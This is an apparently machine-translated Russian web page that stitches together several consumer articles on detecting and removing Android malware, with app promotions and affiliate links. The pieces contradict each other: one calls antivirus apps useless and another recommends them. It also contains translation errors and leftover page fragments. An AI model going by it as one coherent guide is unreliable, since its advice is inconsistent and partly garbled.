В Интернете гораздо больше информации об удалении вирусов для Android, чем для iOS, что упрощает поиск способов его обнаружения.Вы можете обнаружить, что на вашем телефоне есть вредоносное ПО, используя, например, онлайн-сканирование вредоносных программ для Android или детектор рекламного ПО для Android, но знаете ли вы, как остановить вирус на своем телефоне? Вот несколько простых шагов, которые вы можете предпринять, чтобы удалить вирусы или вредоносное ПО с вашего устройства Android.
Удалите вредоносное приложение, зайдя в меню настроек. Затем нажмите «Приложения» или «Диспетчер приложений». Затем коснитесь приложения, которое хотите удалить, выберите «Очистить кеш», затем выберите «Очистить данные», а затем выберите «Удалить».
Чтобы убедиться, что ваш телефон не содержит вредоносных программ, наиболее широко используется метод регулярного сканирования на наличие вредоносных программ с помощью антивирусного приложения. Хотя мы советуем вам действовать с осторожностью, поскольку в сентябре 2017 года было обнаружено, что одно из этих приложений под названием CCleaner было взломано хакерами.

Лучшая защита от мобильных вредоносных программ на телефонах Android

Итак, если антивирус - не ответ, каковы возможные решения мобильной безопасности? Что вам нужно, так это более надежный метод выявления и блокировки потенциальных угроз, включая вредоносное ПО для мобильных устройств.
Благодаря инфраструктуре шлюза Wandera может обнаруживать и перехватывать вредоносные программы до того, как они достигнут устройства. Интуитивно понятная технология использует облачный интеллект миллионов просканированных устройств для обнаружения новых угроз и выявления необычной активности. Затем вредоносные приложения могут быть изучены в режиме реального времени, обеспечивая обнаружение угроз нулевого дня, на которое вы можете положиться. Если в приложении обнаружена уязвимость, вы можете отключить программное обеспечение на нескольких устройствах, чтобы защитить свои данные в течение нескольких секунд.
[идентификатор текстовых блоков = ”загрузка-отчета о вредоносном ПО”]

.

антивирусных приложений для Android бесполезны - вот что делать вместо этого

Этот сайт может получать партнерские комиссии за ссылки на этой странице. Условия эксплуатации.

Android превратился в крупнейшую вычислительную платформу на планете, и это делает ее целью.Вы не можете проводить много времени в Интернете, не услышав о каком-то новом вредоносном ПО для Android, которое определенно на 100% разрушит ваш телефон. Эти отчеты всегда основаны на фактах, но они могут преувеличивать реальные риски обнаружения вредоносного ПО, а определение вредоносного ПО может быть довольно расплывчатым. Охранные фирмы обычно продвигают какое-либо приложение для сканирования вирусов. Однако Android по своей природе более безопасен, чем настольный компьютер, поэтому, возможно, вам не нужны эти приложения безопасности.Вы, наверное, уже получили то, что вам нужно.

The Scare Tactics

В последнем отчете AV-Comparatives мы узнали, что большинство антивирусных приложений на Android даже не проверяют приложения на вредоносное поведение. Они просто используют белые / черные списки для пометки приложений, что неэффективно и делает их не более чем рекламными платформами с поддельными кнопками. Шокирует и расстраивает, правда? Им это может сойти с рук, потому что настоящие вирусы Android, которые захватывают ваше устройство, не так распространены, как вы ожидали.«Вредоносное ПО» может включать более умеренные угрозы, такие как приложения, которые собирают личную информацию или запускают всплывающую рекламу.

Android и другие мобильные платформы уходят корнями в современную эпоху, когда программисты осознавали опасности Интернета. Мы все запрограммированы, чего ожидать от вредоносного ПО для ПК, которое может проникнуть в вашу систему просто потому, что вы зашли не на тот веб-сайт с помощью уязвимого браузера. Эти «попутные загрузки» невозможны на Android без уже существующей инфекции. На Android вам нужно физически нажать на уведомление, чтобы установить APK, загруженный из источника за пределами Play Store.Даже в этом случае есть настройки безопасности, которые необходимо обойти вручную.

Итак, что насчет вредоносных программ в Play Store? Опять же, это зависит от того, что вы подразумеваете под вредоносным ПО. Самые серьезные угрозы безопасности никогда не попадут в магазин. Платформа Google может сканировать известные вредоносные программы при их загрузке. Также существует процесс проверки человеком всего, что кажется даже немного сомнительным. Время от времени вы можете слышать о некоторых «вредоносных» приложениях в Play Store, обычно связанных со сбором информации или рекламными махинациями.Google справляется с этим быстро, но приложения для защиты от вредоносных программ этого не улавливают.

Решение, продвигаемое AV-компаниями, заключается в установке пакета безопасности, который вручную сканирует каждое приложение, отслеживает ваш веб-трафик и так далее. Эти приложения, как правило, истощают ресурсы и обычно раздражают обилием уведомлений и всплывающих окон. Вероятно, вам не нужно устанавливать Lookout, AVG, Norton или какие-либо другие приложения AV на Android. Вместо этого вы можете предпринять несколько вполне разумных шагов, которые не потянут ваш телефон вниз.Например, ваш телефон уже имеет встроенную антивирусную защиту .

Что нужно делать, чтобы оставаться в безопасности

Ваша первая линия защиты - просто не возиться с настройками безопасности Android по умолчанию. Чтобы пройти сертификацию Google, на всех без исключения телефонах и планшетах параметр «Неизвестные источники» отключен в настройках безопасности. Если вы хотите загрузить APK-файл, загруженный не из Google Play, ваш телефон предложит вам включить эту функцию для исходного приложения.Если оставить этот параметр отключенным, вы будете защищены практически от всех вредоносных программ для Android, поскольку их почти нет в Play Маркете.

Однако есть законные причины для разрешения доступа к неизвестным источникам. Например, клиент Amazon Appstore загружает неопубликованные приложения и игры, которые вы покупаете, а многие авторитетные сайты повторно размещают официальные обновления приложений, которые развертываются поэтапно, поэтому вам не нужно ждать своей очереди. Наряду с Play Store у вас также есть Google Play Protect, который сканирует ваши приложения на предмет вредоносной активности.Обновления для Play Protect развертываются через Play Services, поэтому вам не нужны обновления системы, чтобы оставаться защищенным. В большинстве случаев установка стороннего AV-приложения просто дублирует работу Play Protect.

Пользователи рутировали свои телефоны Android с тех пор, как появились первые телефоны, но в наши дни это встречается реже. Платформа предлагает множество функций, которые люди использовали для получения root-прав. Использование Android с root-правами в основном похоже на запуск компьютера в режиме администратора.Хотя телефон с рутированным доступом можно безопасно использовать, это определенно представляет угрозу для безопасности. Некоторым эксплойтам и вредоносным программам для работы необходим root-доступ, и они безвредны, даже если вы каким-то образом их установите. Если у вас нет веских причин для рутирования телефона или планшета, просто не допускайте такой возможности.

Android-приложения также существуют, которые могут не быть «вредоносными» сами по себе, но вы можете не захотеть, чтобы они были на вашем телефоне, потому что они отслеживают ваши данные. Большинство людей не читают разрешения для приложений, которые они устанавливают, но Play Store делает всю эту информацию доступной.Начиная с Android 6.0 и более поздних версий приложениям необходимо запрашивать доступ к конфиденциальным разрешениям, таким как доступ к вашим контактам, локальному хранилищу, микрофону, камере и отслеживанию местоположения. Если у приложения есть причина для доступа к этим модулям (например, приложение социальной сети), вероятно, у вас все в порядке. Если, однако, приложение-фонарик запрашивает ваш список контактов, подумайте еще раз. Системные настройки включают инструменты для ручного отзыва разрешений для любого приложения.

Чтобы избежать вредоносного ПО для Android, действительно требуется немного здравого смысла.Если вы больше ничего не сделаете, ограничьте свои загрузки Play Маркетом и другими 100-процентно надежными источниками, чтобы обезопасить вас практически от всех угроз. Антивирусные приложения в лучшем случае являются избыточными, а в худшем - снижают производительность вашей системы.

Сейчас читаем:

.

Как сканировать и очищать ваше устройство Android от рекламного ПО, вирусов и вредоносных приложений - wintips.org

Последнее обновление 3 апреля 2019 г.

В настоящее время многие разработчики предоставляют бесплатные приложения для платформы Android, но стоимость бесплатного приложения - это реклама (рекламные объявления), которые отображаются при использовании вашего устройства Android. Тем самым разработчик предлагает вам свое приложение бесплатно, но получает доход

от издателя рекламы, что помогает ему оставаться активным и продуктивным.Но приложения, которые предлагаются бесплатно, не всегда заслуживают доверия и могут содержать вредоносный код, чтобы всегда отображать раздражающую рекламу в каждом приложении, которое вы открываете на своем устройстве Android, или ставить под угрозу вашу конфиденциальность. По этой причине хорошей мерой предосторожности является периодическая проверка вашего устройства Android на наличие вредоносного программного обеспечения, удаление всех нежелательных или нераспознанных приложений, а также очистка истории и кеша браузера (временные файлы).

В этом руководстве по удалению вирусов для Android я покажу вам, как сканировать и удалять вредоносные программы (например,г. Рекламное ПО, программы-вымогатели, блокировщики экрана и т. Д.) С вашего устройства Android, а также некоторые инструменты защиты и меры предосторожности, чтобы ваше устройство было чистым и защищенным.

Как защитить свое Android-устройство и себя от вредоносных программ.

  • Избегайте установки приложений из неизвестных источников. Чтобы позаботиться об этом , снимите отметку с опцией « Неизвестные источники » в разделе «Настройки » > Безопасность > Администрирование устройства.
  • Перед тем, как скачать приложение, обязательно ознакомьтесь с отзывами и рейтингом.
  • Всегда проверяйте разрешения и места, к которым приложение хочет получить доступ при загрузке.
  • Всегда обновляйте Android.

Как удалить рекламное и вредоносное ПО с Android (включая вирус FBI Police).

ВНИМАНИЕ: Если ваше устройство Android сильно заражено вредоносным ПО (например, если оно заблокировано вирусом-вымогателем или зависает), вам необходимо ввести Android в Safe Mode перед выполнением следующих шагов.Инструкции по загрузке Android в безопасном режиме можно найти в этой статье: Как загрузить устройство Android в безопасном режиме.

  • Уведомления для устройств, зараженных вирусом Android FBI-Police (или другим) Screen Locker:

1. Имейте в виду, что в некоторых случаях вирус мошеннических сообщений Android FBI ( FBILock-APolice) не может быть удален с некоторых устройств с помощью шагов, описанных в этой статье. В этих случаях, к сожалению, единственный способ вернуть ваше устройство Android к нормальной работе - это сбросить телефон до заводских настроек (заводские настройки по умолчанию).Перед этим сначала убедитесь, что на вашем устройстве нет важных файлов, потому что все ваши файлы и настройки будут удалены.

2. Перед выполнением сброса к заводским настройкам попробуйте и выполните каждый шаг этой статьи. Если вы не можете выполнить шаг, переходите к следующему.

3. Для владельцев Amazon Kindle : единственный способ (насколько я знаю) удалить вирус блокировки экрана FBI-Police - это сбросить ваше устройство KINDLE до заводских настроек по умолчанию (в безопасном режиме).

Шаг 1. Остановите все недавно использованные приложения на вашем устройстве Android.

Прежде всего, вы должны закрыть все недавно использованные (открытые) приложения. Это зависит от модели вашего телефона. Например:

* Примечание. Если вы не знаете, как закрыть недавно использованные приложения, просто перезагрузите телефон и переходите к следующему шагу.

Шаг 2. Закройте работающие фоновые приложения.

Теперь продолжите и закройте все приложения, которые все еще работают в фоновом режиме (например,г. Internet Explorer, Chrome и т. Д.).

1. Перейти к Приложениям.

2. Коснитесь Настройки.

3. Нажмите, чтобы открыть меню Application Manager или Apps . *

* Примечания:
1. В Samsung S3 и других устройствах диспетчер приложений (приложения) можно найти в меню Еще (вверху).
2. На телефонах XIAOMI перейдите к Установленные приложения.

4. В диспетчере приложений откройте вкладку «Запуск» , чтобы отобразить все запущенные приложения. *

* Примечание. НА телефонах XIAOMI запущенные приложения обозначаются циклическим зеленым кружком.

5. В списке приложений « Running » нажмите, чтобы открыть, а затем остановить (принудительная остановка):

    1. Любое связанное приложение интернет-браузера (например,г. Chrome, Internet Explorer и т. Д.)
    2. Любое нераспознанное или не важное для системы приложение, которое все еще работает.

6. Когда закончите, вернитесь на главный экран Application Manager и перейдите к следующему шагу.

Шаг 3. Удалите все недавно загруженные или неизвестные приложения с вашего устройства Android.

1. В диспетчере приложений перейдите к меню (список) приложений « Все ».

* Примечание. НА телефонах XIAOMI нажмите кнопку «Удалить» в меню «Установленные приложения».

2. Просмотрите все установленные приложения и удалите : *

    1. Любое нежелательное или нераспознанное приложение или плагин (например: BaDoink , Porn-player , Обновление браузера 1.0 , Flash Player, Porn Droid, System Update и т. Д.)
    2. Любое приложение, которое вы недавно установили на свое устройство Android.

* Примечание 1. Чтобы полностью удалить / удалить вредоносное приложение для Android:

    • Коснитесь приложения, которое хотите удалить с устройства Android.
    • На экране информации о приложении : Если приложение в настоящее время работает, нажмите Принудительно остановить.
    • Затем нажмите Очистить кеш .
    • Затем нажмите Очистить данные .
    • Наконец нажмите Удалить . *

* Примечание 2.Если Удалить вариант неактивен (обычно после заражения вирусом Android Screen Locker ), перейдите по адресу:

1. Настройки > Безопасность > Администраторы устройства .
2. Нажмите на приложение, которое вы не можете удалить.
3. Выберите « Деактивировать, »> « OK». и немедленно выключат (или извлекут аккумулятор) вашего устройства.
4. Снова запустите устройство и удалите вредоносное приложение.

7. Повторите описанную выше процедуру, чтобы удалить все нежелательные или нераспознанные приложения.

Шаг 4. Удалите ненужные файлы.

Пришло время удалить все ненужные файлы с вашего устройства Android (например, временные файлы Интернета, кеш приложений и т. Д.). Этот шаг очень важен для поддержания чистоты и безопасности вашего устройства Android. Некоторые пользователи Android также сообщили, что после очистки истории просмотров и содержимого кеша им удалось вылечить и удалить сообщение на экране блокировки полицейского мошенничества (мошенничества) со своего устройства Android.

A. Очистить историю интернет-браузера и кэш в браузере Android:

1. Откройте свой Интернет-браузер (например, Internet Explorer) и нажмите клавишу меню Option (кнопка).

2. Коснитесь Настройки .

3. В Настройки коснитесь Конфиденциальность и безопасность.

4. Нажмите Очистить кеш , чтобы очистить кэшированный контент и историю баз данных.

5. Нажмите Очистить историю , чтобы очистить историю навигации в браузере.

B. Очистить данные кэша приложений на Android:

Затем очистите все кэшированные данные всех установленных приложений на вашем устройстве. Для этой задачи я предпочитаю запускать приложение CCleaner для Android. CCleaner - это бесплатное программное обеспечение, которое может помочь вам содержать ваше устройство Android в чистоте и безопасности, поскольку оно может легко удалить все ненужные файлы, снижающие производительность вашего устройства.Для очистки кеша приложений на android:

1. Скачать CCleaner для Android

1. Открыть Google Play store.
2. В поле поиска введите « ccleaner » и коснитесь значка поиска.

3. Нажмите « CCleaner », чтобы открыть его, а затем нажмите « Установить ».

4. Внимательно прочтите требования к приложению и, если вы согласны, нажмите « Принять ».

5. Подождите, пока « CCleaner » будет установлен, а затем продолжайте ниже.

——————————————————————————————-

2. Как удалить ненужные файлы с Android с помощью CCleaner

1. Нажмите в приложении CCleaner , чтобы открыть его.
2. Метчик АНАЛИЗ .

3. Когда анализ будет завершен, коснитесь, чтобы установить флажки рядом с « История браузера » и « Кэш ».Также проверьте любое другое приложение, из которого вы хотите удалить кэшированное содержимое.

4. Наконец нажмите ОЧИСТИТЬ.

Шаг 5. Обнаружение и удаление вредоносных приложений с помощью MalwareBytes Anti-Malware для Android.

Одна из самых популярных и надежных программ защиты от вредоносных программ для платформ Windows теперь доступна для вашего устройства Android. Malwarebytes Anti-Malware для Android помогает защитить ваше устройство от вредоносных программ, подозрительных приложений и многого другого.Чтобы удалить вредоносные приложения с помощью MalwareBytes на Android:

1. Загрузите MalwareBytes Anti-Malware для Android

1. Откройте магазин Google Play.
2. В поле поиска введите « вредоносных байтов », а затем нажмите значок поиска.

3. Нажмите « MalwareBytes Anti-Malware» , а затем нажмите « Установить ».

4. Внимательно прочтите требования к приложению и, если вы согласны, нажмите « Принять ».

5. Подождите, пока установится « MalwareBytes Anti-Malware », а затем действуйте ниже.

——————————————————————————————-

2. Как проверить ваше устройство Android на наличие вредоносных программ и подозрительных приложений с помощью MalwareBytes

1. Откройте приложение MalwareBytes Anti-Malware .
2. Подождите, пока MalwareBytes Anti-Malware просканирует ваше устройство Android на наличие вредоносных программ.

3. По завершении сканирования нажмите « ПРОСМОТР РЕЗУЛЬТАТОВ ».

4. Если сканирование MalwareBytes Anti-Malware обнаружило подозрительные приложения на вашем устройстве, выберите действие, рекомендованное программой.

Вот и все! Сообщите мне, помогло ли вам это руководство, оставив свой комментарий о своем опыте.Пожалуйста, поставьте лайк и поделитесь этим руководством, чтобы помочь другим.

Если эта статья была для вас полезной, поддержите нас, сделав пожертвование. Даже 1 доллар может иметь огромное значение для нас в наших усилиях продолжать помогать другим, сохраняя при этом этот сайт бесплатным: Смотрите лучшие предложения на Woot! Компания-амазонка доступна только сегодня. Бесплатная доставка для членов Prime! Если вы хотите, чтобы постоянно защищал от вредоносных программ, существующих и будущих , мы рекомендуем вам установить Malwarebytes Anti-Malware PRO , нажав ниже (мы действительно зарабатываете комиссию от продаж, произведенных по этой ссылке, но без дополнительных затрат для вас.У нас есть опыт работы с этим программным обеспечением, и мы рекомендуем его, потому что оно полезно и полезно):

Полная защита домашнего ПК - Защитите до 3 ПК с помощью НОВОГО ПО Malwarebytes Anti-Malware Premium!

.

Смотрите также